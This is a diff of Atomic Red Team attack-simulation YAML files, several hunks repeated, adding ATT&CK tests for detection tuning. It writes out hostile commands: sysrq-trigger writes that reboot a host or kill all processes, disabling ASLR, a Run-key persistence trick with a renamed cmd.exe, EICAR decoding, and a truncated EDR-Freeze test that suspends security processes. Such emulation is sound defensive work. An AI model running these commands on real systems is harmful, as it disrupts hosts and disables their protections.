+            by bak3n3k0. No data has been encrypted. This simulation exercises
+            detections for:
+              - notepad.exe launched with a ransom-themed text file
+              - creation of a ransom-themed text file in %TEMP%
+            NON-DESTRUCTIVE Atomic Red Team test.
+      dependency_executor_name: command_prompt
+      dependencies:
+      - description: Notepad must be present on the system
+        prereq_command: where notepad
+        get_prereq_command: ''
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $notePath = Join-Path $env:TEMP "#{note_filename}"
+          $pidPath  = Join-Path $env:TEMP "#{pid_filename}"
+
+          $Title = "#{note_title}"
+          $Body  = "#{note_body}"
+
+          $header  = $Title + "`r`n" + ('=' * $Title.Length) + "`r`n`r`n"
+          $content = $header + $Body
+
+          [System.IO.File]::WriteAllText($notePath, $content, [System.Text.Encoding]::UTF8)
+
+          $p = Start-Process notepad.exe -ArgumentList "`"$notePath`"" -PassThru
+          $p.Id | Out-File -FilePath $pidPath -Encoding ascii -Force
+        cleanup_command: |
+          try {
+            # 1. Kill all Notepad processes
+            Get-Process notepad -ErrorAction SilentlyContinue |
+              ForEach-Object {
+                Stop-Process -Id $_.Id -Force -ErrorAction SilentlyContinue
+              }
+
+            # 2. Wait briefly for Windows to release file handles
+            Start-Sleep -Seconds 1
+
+            # 3. Force delete ransom note + PID file
+            $notePath = Join-Path $env:TEMP "ART-T1491-ransom-note.txt"
+            $pidPath  = Join-Path $env:TEMP "ART-T1491-notepad.pid"
+
+            if (Test-Path $notePath) {
+              Remove-Item $notePath -Force -ErrorAction Stop
+            }
+            if (Test-Path $pidPath) {
+              Remove-Item $pidPath -Force -ErrorAction Stop
+            }
+          }
+          catch {
+            Write-Warning "Cleanup failed with error: $_"
+          }
  T1496.004:
    technique:
      type: attack-pattern
@@ -123020,6 +123401,21 @@ impact:
          '
        name: command_prompt
        elevation_required: false
+    - name: Abuse of Linux Magic System Request Key for Reboot
+      auto_generated_guid: d2a1f4bc-a064-4223-8281-a086dce5423c
+      description: 'adversaries with root or sufficient privileges to silently manipulate
+        or destabilize a system. By writing to /proc/sysrq-trigger, they can forced
+        to reboot.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: 'echo "b" > /proc/sysrq-trigger
+
+          '
+        name: bash
+        elevation_required: true
 initial-access:
  T1133:
    technique:
@@ -1520,7 +1520,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:58:05.840Z'
-      name: Encrypted/Encoded File
+      name: 'Obfuscated Files or Information: Encrypted/Encoded File'
      description: "Adversaries may encrypt or encode files to obfuscate strings,
        bytes, and other specific patterns to impede detection. Encrypting and/or
        encoding file content aims to conceal malicious artifacts within a file used
@@ -1569,7 +1569,48 @@ defense-evasion:
      x_mitre_data_sources:
      - 'File: File Creation'
      - 'File: File Metadata'
-    atomic_tests: []
+      identifier: T1027.013
+    atomic_tests:
+    - name: Decode Eicar File and Write to File
+      auto_generated_guid: 7693ccaa-8d64-4043-92a5-a2eb70359535
+      description: Decode the eicar value, and write it to file, for AV/EDR to try
+        to catch.
+      supported_platforms:
+      - windows
+      - macos
+      - linux
+      executor:
+        command: |-
+          $encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
+          $bytes = [System.Convert]::FromBase64String($encodedString)
+          $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
+
+          #write the decoded eicar string to file
+          $decodedString | Out-File T1027.013_decodedEicar.txt
+        cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
+        name: powershell
+        elevation_required: false
+    - name: Decrypt Eicar File and Write to File
+      auto_generated_guid: b404caaa-12ce-43c7-9214-62a531c044f7
+      description: Decrypt the eicar value, and write it to file, for AV/EDR to try
+        to catch.
+      supported_platforms:
+      - windows
+      - macos
+      - linux
+      executor:
+        command: |-
+          $encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
+          $key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
+
+          $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
+          $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
+
+          #Write the decrypted eicar string to a file
+          $decryptedString | out-file T1027.013_decryptedEicar.txt
+        cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
+        name: powershell
+        elevation_required: false
  T1014:
    technique:
      type: attack-pattern
@@ -2588,7 +2629,7 @@ defense-evasion:
      identifier: T1036.005
    atomic_tests:
    - name: Execute a process from a directory masquerading as the current parent
-        directory.
+        directory
      auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
      description: 'Create and execute a process from a directory masquerading as
        the current parent directory (`...` instead of normal `..`)
@@ -12779,6 +12820,21 @@ defense-evasion:
          | Set-AdvancedSetting -Value '0' -Confirm:$false\nDisconnect-VIServer -Confirm:$false\n"
        name: powershell
        elevation_required: true
+    - name: Disable ASLR Via sysctl parameters - Linux
+      auto_generated_guid: ac333fe1-ce2b-400b-a117-538634427439
+      description: Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0`
+        which disables Address Space Layout Randomization (ASLR) in Linux.
+      supported_platforms:
+      - linux
+      executor:
+        command: 'sysctl -w kernel.randomize_va_space=0
+
+          '
+        cleanup_command: 'sysctl -w kernel.randomize_va_space=2
+
+          '
+        name: bash
+        elevation_required: true
  T1601:
    technique:
      type: attack-pattern
@@ -17975,7 +18031,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -18052,7 +18108,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -53069,7 +53124,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -53146,7 +53201,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -58826,7 +58880,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -58862,6 +58916,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -62905,6 +62960,18 @@ discovery:
          find . -type f -name ".*"
        cleanup_command: 'rm #{output_file}'
        name: sh
+    - name: Identifying Network Shares - Linux
+      auto_generated_guid: 361fe49d-0c19-46ec-a483-ccb92d38e88e
+      description: |
+        If the system uses network file systems (e.g., NFS, CIFS), findmnt can help locate paths to remote shares.
+        Attackers may then attempt to access these shares for lateral movement or data exfiltration.
+      supported_platforms:
+      - linux
+      executor:
+        command: 'findmnt -t nfs
+
+          '
+        name: sh
  T1049:
    technique:
      type: attack-pattern
@@ -71013,6 +71080,21 @@ impact:
          '
        name: sh
        elevation_required: true
+    - name: Abuse of linux magic system request key for Send a SIGTERM to all processes
+      auto_generated_guid: 6e76f56f-2373-4a6c-a63f-98b7b72761f1
+      description: 'Adversaries with root or sufficient privileges Send a SIGTERM
+        to all processes, except for init. By writing ''e'' to /proc/sysrq-trigger,
+        they can forced kill all processes, except for init.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: 'echo "e" > /proc/sysrq-trigger
+
+          '
+        name: bash
+        elevation_required: true
  T1499.004:
    technique:
      type: attack-pattern
@@ -73115,6 +73197,21 @@ impact:
          '
        name: bash
        elevation_required: true
+    - name: Abuse of Linux Magic System Request Key for Reboot
+      auto_generated_guid: d2a1f4bc-a064-4223-8281-a086dce5423c
+      description: 'adversaries with root or sufficient privileges to silently manipulate
+        or destabilize a system. By writing to /proc/sysrq-trigger, they can forced
+        to reboot.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: 'echo "b" > /proc/sysrq-trigger
+
+          '
+        name: bash
+        elevation_required: true
 initial-access:
  T1133:
    technique:
@@ -1319,7 +1319,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:58:05.840Z'
-      name: Encrypted/Encoded File
+      name: 'Obfuscated Files or Information: Encrypted/Encoded File'
      description: "Adversaries may encrypt or encode files to obfuscate strings,
        bytes, and other specific patterns to impede detection. Encrypting and/or
        encoding file content aims to conceal malicious artifacts within a file used
@@ -1368,7 +1368,48 @@ defense-evasion:
      x_mitre_data_sources:
      - 'File: File Creation'
      - 'File: File Metadata'
-    atomic_tests: []
+      identifier: T1027.013
+    atomic_tests:
+    - name: Decode Eicar File and Write to File
+      auto_generated_guid: 7693ccaa-8d64-4043-92a5-a2eb70359535
+      description: Decode the eicar value, and write it to file, for AV/EDR to try
+        to catch.
+      supported_platforms:
+      - windows
+      - macos
+      - linux
+      executor:
+        command: |-
+          $encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
+          $bytes = [System.Convert]::FromBase64String($encodedString)
+          $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
+
+          #write the decoded eicar string to file
+          $decodedString | Out-File T1027.013_decodedEicar.txt
+        cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
+        name: powershell
+        elevation_required: false
+    - name: Decrypt Eicar File and Write to File
+      auto_generated_guid: b404caaa-12ce-43c7-9214-62a531c044f7
+      description: Decrypt the eicar value, and write it to file, for AV/EDR to try
+        to catch.
+      supported_platforms:
+      - windows
+      - macos
+      - linux
+      executor:
+        command: |-
+          $encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
+          $key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
+
+          $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
+          $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
+
+          #Write the decrypted eicar string to a file
+          $decryptedString | out-file T1027.013_decryptedEicar.txt
+        cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
+        name: powershell
+        elevation_required: false
  T1014:
    technique:
      type: attack-pattern
@@ -2136,7 +2177,7 @@ defense-evasion:
      identifier: T1036.005
    atomic_tests:
    - name: Execute a process from a directory masquerading as the current parent
-        directory.
+        directory
      auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
      description: 'Create and execute a process from a directory masquerading as
        the current parent directory (`...` instead of normal `..`)
@@ -16469,7 +16510,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -16546,7 +16587,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -49641,7 +49681,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -49718,7 +49758,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -54563,7 +54602,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -54599,6 +54638,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -1097,7 +1097,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:58:05.840Z'
-      name: Encrypted/Encoded File
+      name: 'Obfuscated Files or Information: Encrypted/Encoded File'
      description: "Adversaries may encrypt or encode files to obfuscate strings,
        bytes, and other specific patterns to impede detection. Encrypting and/or
        encoding file content aims to conceal malicious artifacts within a file used
@@ -1146,6 +1146,7 @@ defense-evasion:
      x_mitre_data_sources:
      - 'File: File Creation'
      - 'File: File Metadata'
+      identifier: T1027.013
    atomic_tests: []
  T1014:
    technique:
@@ -14385,7 +14386,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14462,7 +14463,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -44673,7 +44673,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -44750,7 +44750,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -48926,7 +48925,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -48962,6 +48961,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -1046,7 +1046,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:58:05.840Z'
-      name: Encrypted/Encoded File
+      name: 'Obfuscated Files or Information: Encrypted/Encoded File'
      description: "Adversaries may encrypt or encode files to obfuscate strings,
        bytes, and other specific patterns to impede detection. Encrypting and/or
        encoding file content aims to conceal malicious artifacts within a file used
@@ -1095,6 +1095,7 @@ defense-evasion:
      x_mitre_data_sources:
      - 'File: File Creation'
      - 'File: File Metadata'
+      identifier: T1027.013
    atomic_tests: []
  T1014:
    technique:
@@ -14204,7 +14205,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14281,7 +14282,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -44252,7 +44252,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -44329,7 +44329,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -48505,7 +48504,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -48541,6 +48540,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -1514,7 +1514,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:58:05.840Z'
-      name: Encrypted/Encoded File
+      name: 'Obfuscated Files or Information: Encrypted/Encoded File'
      description: "Adversaries may encrypt or encode files to obfuscate strings,
        bytes, and other specific patterns to impede detection. Encrypting and/or
        encoding file content aims to conceal malicious artifacts within a file used
@@ -1563,7 +1563,48 @@ defense-evasion:
      x_mitre_data_sources:
      - 'File: File Creation'
      - 'File: File Metadata'
-    atomic_tests: []
+      identifier: T1027.013
+    atomic_tests:
+    - name: Decode Eicar File and Write to File
+      auto_generated_guid: 7693ccaa-8d64-4043-92a5-a2eb70359535
+      description: Decode the eicar value, and write it to file, for AV/EDR to try
+        to catch.
+      supported_platforms:
+      - windows
+      - macos
+      - linux
+      executor:
+        command: |-
+          $encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
+          $bytes = [System.Convert]::FromBase64String($encodedString)
+          $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
+
+          #write the decoded eicar string to file
+          $decodedString | Out-File T1027.013_decodedEicar.txt
+        cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
+        name: powershell
+        elevation_required: false
+    - name: Decrypt Eicar File and Write to File
+      auto_generated_guid: b404caaa-12ce-43c7-9214-62a531c044f7
+      description: Decrypt the eicar value, and write it to file, for AV/EDR to try
+        to catch.
+      supported_platforms:
+      - windows
+      - macos
+      - linux
+      executor:
+        command: |-
+          $encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
+          $key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
+
+          $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
+          $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
+
+          #Write the decrypted eicar string to a file
+          $decryptedString | out-file T1027.013_decryptedEicar.txt
+        cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
+        name: powershell
+        elevation_required: false
  T1014:
    technique:
      type: attack-pattern
@@ -3132,6 +3173,69 @@ defense-evasion:

          '
        name: powershell
+    - name: Masquerading cmd.exe as VEDetector.exe
+      auto_generated_guid: 03ae82a6-9fa0-465b-91df-124d8ca5c4e8
+      description: |
+        This test simulates an adversary renaming cmd.exe to VEDetector.exe to masquerade as a legitimate application.
+        The test copies cmd.exe, renames it to VEDetector.exe, adds a registry run key for persistence, and executes the renamed binary.
+        This technique may be used to evade detection by mimicking legitimate software names or locations.
+
+        **Expected Output:**
+        - A new process named VEDetector.exe appears in the process list, but its behavior matches cmd.exe.
+        - SIEM/EDR systems may detect this as suspicious process activity (e.g., Sysmon Event ID 1 for process creation, or Event ID 13 for registry modifications).
+        - Registry modification in HKLM:\Software\Microsoft\Windows\CurrentVersion\Run may trigger persistence alerts in XDR platforms.
+
+        **References:**
+        - [MITRE ATT&CK T1036.005](https://attack.mitre.org/techniques/T1036/005/)
+        - [Sysmon Process Creation](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)
+      supported_platforms:
+      - windows
+      input_arguments:
+        ved_path:
+          description: Directory path where VEDetector.exe will be created
+          type: Path
+          default: "$env:TEMP"
+        source_file:
+          description: Path to the source cmd.exe file
+          type: Path
+          default: "$env:SystemRoot\\System32\\cmd.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The source cmd.exe file must exist on the system.
+
+          '
+        prereq_command: 'if (Test-Path "#{source_file}") { exit 0 } else { exit 1
+          }
+
+          '
+        get_prereq_command: |
+          Write-Host "[-] Source file not found: #{source_file}. Ensure cmd.exe exists in the specified path."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          # Copy and rename cmd.exe to VEDetector.exe
+          Copy-Item -Path "#{source_file}" -Destination "#{ved_path}\VEDetector.exe" -Force
+
+          # Create registry run key for persistence
+          New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -Value "#{ved_path}\VEDetector.exe" -PropertyType String -Force
+
+          # Start the renamed process
+          Start-Process -FilePath "#{ved_path}\VEDetector.exe"
+
+          Start-Sleep -Seconds 5
+        cleanup_command: |
+          # Remove registry key
+          Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -ErrorAction SilentlyContinue
+
+          # Stop the process
+          Stop-Process -Name "VEDetector" -Force -ErrorAction SilentlyContinue
+
+          # Remove the file
+          Remove-Item -Path "#{ved_path}\VEDetector.exe" -Force -ErrorAction SilentlyContinue
+
+          Write-Host "[+] Cleaned up VEDetector artifacts"
  T1600:
    technique:
      type: attack-pattern
@@ -6563,6 +6667,36 @@ defense-evasion:
          del %temp%\T1140_calc2.txt >nul 2>&1
          del %temp%\T1140_calc2_decoded.exe >nul 2>&1
        name: command_prompt
+    - name: Expand CAB with expand.exe
+      auto_generated_guid: 9f8b1c54-cb76-4d5e-bb1f-2f5c0e8f5a11
+      description: |
+        Uses expand.exe to extract a file from a CAB created locally. This simulates adversarial use of expand on cabinet archives.
+        Upon success, art-expand-source.txt is extracted next to the CAB.
+      supported_platforms:
+      - windows
+      input_arguments:
+        cab_path:
+          description: Path to the CAB to expand (created if missing)
+          type: path
+          default: "%TEMP%\\art-expand-test.cab"
+        output_dir:
+          description: Destination directory
+          type: path
+          default: "%TEMP%\\art-expand-out"
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: |
+          mkdir "#{output_dir}" >nul 2>&1
+          echo hello from atomic red team > "PathToAtomicsFolder\T1140\src\art-expand-source.txt"
+          makecab "PathToAtomicsFolder\T1140\src\art-expand-source.txt" "#{cab_path}"
+          pushd "#{output_dir}"
+          expand "#{cab_path}" -F:* .
+          popd
+        cleanup_command: |
+          del "PathToAtomicsFolder\T1140\src\art-expand-source.txt" >nul 2>&1
+          del "#{cab_path}" >nul 2>&1
+          rmdir "#{output_dir}" /s /q >nul 2>&1
  T1562:
    technique:
      type: attack-pattern
@@ -19359,6 +19493,112 @@ defense-evasion:
          -Name Enabled -Value 1 -PropertyType "DWord" -Force
        name: powershell
        elevation_required: true
+    - name: Freeze PPL-protected process with EDR-Freeze
+      auto_generated_guid: cbb2573a-a6ad-4c87-aef8-6e175598559b
+      description: This test utilizes the tool EDR-Freeze, which leverages the native
+        Microsoft binary WerFaultSecure.exe to suspend processes protected by the
+        Protected Process Light mechanism. PPL is a Windows security feature designed
+        to safeguard critical system processes — such as those related to antivirus,
+        credential protection, and system integrity — from tampering or inspection.
+        These processes operate in a restricted environment that prevents access even
+        from administrators or debugging tools, unless the accessing tool is signed
+        and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently
+        trusted by the operating system, EDR-Freeze is able to bypass these restrictions
